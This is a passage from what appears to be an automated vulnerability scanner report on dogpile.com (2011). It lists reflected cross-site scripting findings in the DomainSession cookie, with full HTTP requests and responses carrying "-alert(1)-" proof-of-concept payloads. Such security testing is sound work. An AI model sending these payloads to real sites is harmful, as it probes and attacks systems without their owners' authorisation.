ansactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=f4a5e3c498ee4fafa621c16a3af0cb01&ActionId=b0aa64e9143c4175b855c16a3af0cb01&CookieDomain=.dogpile.com7b752"-alert(1)-"af835610013; expires=Fri, 01 Apr 2011 17:34:27 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.128. http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11 [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b37d"-alert(1)-"effb104696b was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677814261; wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:13:12 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=effaa55f51f3463da4cac16a3af0cb01&ActionId=3e82ee12b85f4b1a9dd9c16a3af0cb01&CookieDomain=.dogpile.com7b37d"-alert(1)-"effb104696b

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=3e82ee12b85f4b1a9dd9c16a3af0cb01&ActionId=973f3f31d2bf4a5f81ddc16a3af0cb01&CookieDomain=.dogpile.com7b37d"-alert(1)-"effb104696b; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:34:31 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:14:31 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:14:31 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:14:30 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 64231

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=ba3967d21c5c40fc92fdc16a3af0cb01&SessionId=ee7a38726f9f4b44b1a6c16a3af0cb01&PrevActionId=3e82ee12b85f4b1a9dd9c16a3af0cb01&ActionId=973f3f31d2bf4a5f81ddc16a3af0cb01&CookieDomain=.dogpile.com7b37d"-alert(1)-"effb104696b; expires=Fri, 01 Apr 2011 17:34:31 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.129. http://www.dogpile.com/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/ [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55b30"-alert(1)-"3ee9c7682b4 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/ HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3725104394.20480.0000+cacheId+ms16:1301677190970; wsRecent=MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; wsViewRecent=1; DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:09:49 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; DomainSession=TransactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=d32b0d4b3c514b5288d5c16a3af0cb01&ActionId=9a55e47eb80046fb8013c16a3af0cb01&CookieDomain=.dogpile.com55b30"-alert(1)-"3ee9c7682b4

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=9a55e47eb80046fb8013c16a3af0cb01&ActionId=5fefb16cf0bd440c93eac16a3af0cb01&CookieDomain=.dogpile.com55b30"-alert(1)-"3ee9c7682b4; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:30:54 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=8304cc0b8ab744899107c16a3af0cb01&LastSeenDateTime=4/1/2011 5:10:54 PM&IssueDateTime=4/1/2011 5:08:07 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 17:10:54 GMT; path=/
Set-Cookie: wsTemp=bigIP+3741881610.20480.0000+cacheId+ms17:1301677854263; path=/
Set-Cookie: wsRecent=april+fools+day+pranks,Web,Relevance,&MLB+Schedule,Web,Relevance,&Go+Daddy+CEO+Elephant,Web,Relevance,; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:10:54 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 160297

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=26f28f0af78442bc9f5bc16a3af0cb01&SessionId=d357b6175b6f40c6abe8c16a3af0cb01&PrevActionId=9a55e47eb80046fb8013c16a3af0cb01&ActionId=5fefb16cf0bd440c93eac16a3af0cb01&CookieDomain=.dogpile.com55b30"-alert(1)-"3ee9c7682b4; expires=Fri, 01 Apr 2011 17:30:54 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.130. http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11 [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 172f4"-alert(1)-"a0abe5fa114 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com172f4"-alert(1)-"a0abe5fa114; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=6bf660ba2f2d44129b9bc16a3af0cb01&CookieDomain=.dogpile.com172f4"-alert(1)-"a0abe5fa114; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:00 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:00 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:00 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 42237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=6bf660ba2f2d44129b9bc16a3af0cb01&CookieDomain=.dogpile.com172f4"-alert(1)-"a0abe5fa114; expires=Fri, 01 Apr 2011 17:18:00 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.131. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11 [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/faq/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da425"-alert(1)-"23f7cc263dd was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=859dec9ca7a74a60921ac16a3af0cb01&CookieDomain=.dogpile.comda425"-alert(1)-"23f7cc263dd; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=3f3afdc0d56d4edda83ec16a3af0cb01&CookieDomain=.dogpile.comda425"-alert(1)-"23f7cc263dd; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:32 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:32 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:32 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:32 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=3f3afdc0d56d4edda83ec16a3af0cb01&CookieDomain=.dogpile.comda425"-alert(1)-"23f7cc263dd; expires=Fri, 01 Apr 2011 17:16:32 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.132. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11 [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/faq/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6232"-alert(1)-"0b9efa05740 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/faq/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=859dec9ca7a74a60921ac16a3af0cb01&CookieDomain=.dogpile.coma6232"-alert(1)-"0b9efa05740; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=461d8d5cd4b54b13a781c16a3af0cb01&CookieDomain=.dogpile.coma6232"-alert(1)-"0b9efa05740; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:37 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:37 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:37 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:36 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 64613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=859dec9ca7a74a60921ac16a3af0cb01&ActionId=461d8d5cd4b54b13a781c16a3af0cb01&CookieDomain=.dogpile.coma6232"-alert(1)-"0b9efa05740; expires=Fri, 01 Apr 2011 17:18:37 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.133. http://www.dogpile.com/dogpile_other/ws/index [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21ae4"-alert(1)-"eecc2711024 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/index HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://dogpile.com/dogpile/ws/index/qcat=wp/_iceUrlFlag=11?_IceUrl=true
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=9ca43f5d994646fab1d4c16a3af0cb01&ActionId=bc343352182e410c9000c16a3af0cb01&CookieDomain=.dogpile.com21ae4"-alert(1)-"eecc2711024; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:55:56 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=bc343352182e410c9000c16a3af0cb01&ActionId=a02f9479f63c45cfad66c16a3af0cb01&CookieDomain=.dogpile.com21ae4"-alert(1)-"eecc2711024; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:04 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:04 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:04 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:03 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=bc343352182e410c9000c16a3af0cb01&ActionId=a02f9479f63c45cfad66c16a3af0cb01&CookieDomain=.dogpile.com21ae4"-alert(1)-"eecc2711024; expires=Fri, 01 Apr 2011 17:16:04 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.134. http://www.dogpile.com/dogpile_other/ws/index [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37a9f"-alert(1)-"9ff850e7c98 was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/index HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wsTemp=bigIP+3792213258.20480.0000+cacheId+ms20:1301676964559; wsRecent=Go+Daddy+CEO+Elephant,Web,Relevance,&MLB+Schedule,Web,Relevance,; wsViewRecent=1; DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=86d1546926784d5188d2c16a3af0cb01&ActionId=f1e07d8163f9435e87f8c16a3af0cb01&CookieDomain=.dogpile.com37a9f"-alert(1)-"9ff850e7c98; DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:05 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=af484727a0d14b41a32ec16a3af0cb01&CookieDomain=.dogpile.com37a9f"-alert(1)-"9ff850e7c98; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:16:28 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:56:28 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:56:28 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:56:27 GMT
Connection: close
Vary: Accept-Encoding, User-Agent
Content-Length: 45971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="DocumentRoot">
<head>


...[SNIP]...
ansactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=f1e07d8163f9435e87f8c16a3af0cb01&ActionId=af484727a0d14b41a32ec16a3af0cb01&CookieDomain=.dogpile.com37a9f"-alert(1)-"9ff850e7c98; expires=Fri, 01 Apr 2011 17:16:28 GMT; domain=.dogpile.com; path=/";
}
window.onload=fix_cookies;
window.onfocus=fix_cookies;
//-->
...[SNIP]...

2.135. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11 [DomainSession cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11

Issue detail

The value of the DomainSession cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f72c"-alert(1)-"f359c353bfe was submitted in the DomainSession cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11?_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
Referer: http://www.dogpile.com/dogpile_other/ws/index
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
